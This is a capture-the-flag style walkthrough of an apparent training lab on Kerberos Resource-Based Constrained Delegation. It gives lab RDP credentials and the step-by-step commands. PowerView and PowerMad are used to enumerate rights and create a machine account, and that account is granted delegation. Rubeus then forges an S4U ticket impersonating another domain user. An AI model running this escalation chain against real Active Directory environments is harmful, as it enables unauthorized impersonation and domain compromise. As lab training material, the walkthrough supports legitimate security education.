IML - Kerberos: Ep.11 – Resource-Based Constrained Delegation (RBCD)

Kerberos Ep.11 – Resource-Based Constrained Delegation (RBCD) - A walkthrough of the challenge with enumeration, exploitation and privilege escalation steps.

  • RDP:

xfreerdp /v:10.102.81.46 /u:s.villanelle /p:Summ3r2021! /d:krbtown +clipboard +drives /drive:root,/home/kali /dynamic-resolution

  • Enumeration:

. .\PowerView.ps1

get-domainuser s.villanelle -properties objectsid | select -exp objectsid

  • Then, use the SID to enumerate what rights you have over Workstation-02 by running the command:

get-domainobjectacl workstation-02 | ?{$_.SecurityIdentifier -eq "[USER_SID]"}

get-domainobjectacl workstation-02 | ?{$_.SecurityIdentifier -eq "S-1-5-21-2984655098-284417223-3543700247-1121"}

  • Open Elevated Powershell:

. .\Powerview.ps1

Get-DomainObject -Identity "dc=krbtown,dc=local" -Domain krbtown.local

  • Open Elevated Powershell:

. .\Powerview.ps1

Get-NetComputer Workstation-02 | Select-Object -Property name, msDS-AllowedToActOnBehalfOfOtherIdentity

  • Open Elevated Powershell:

. .\PowerMad.ps1

New-MachineAccount -MachineAccount <ANY_MACHINE_NAME> -Password $(ConvertTo-SecureString '<RANDOM_PASSWORD>' -AsPlainText -Force) -Verbose

Give the machine a name of your choice and a password that meets the password policy:

New-MachineAccount -MachineAccount terminator -Password $(ConvertTo-SecureString 'Password123' -AsPlainText -Force) -Verbose

Set-ADComputer workstation-02 -PrincipalsAllowedToDelegateToAccount <NEW_MACHINE_NAME>$

Set-ADComputer workstation-02 -PrincipalsAllowedToDelegateToAccount terminator$

  • Open Elevated Powershell:

. .\Powerview.ps1

Get-ADComputer workstation-02 -Properties PrincipalsAllowedToDelegateToAccount

  • Open Elevated Powershell:

.\Rubeus.exe hash /password:<PASSWORD_OF_NEW_MACHINE> /user:<NEW_MACHINE_USERNAME>$ /domain:krbtown.local

.\Rubeus.exe hash /password:Password123 /user:terminator$ /domain:krbtown.local

.\Rubeus.exe s4u /user:<NEW_MACHINE_USERNAME>$ /rc4:<NEW_MACHINE_HASH> /impersonateuser:a.belridge /domain:krbtown.local /msdsspn:cifs/workstation-02.krbtown.local /ptt

.\Rubeus.exe s4u /user:terminator$ /rc4:58A478135A93AC3BF058A5EA0E8FDB71 /impersonateuser:a.belridge /domain:krbtown.local /msdsspn:cifs/workstation-02.krbtown.local /ptt

  • Check with: klist


This post is licensed under CC BY 4.0 by the author.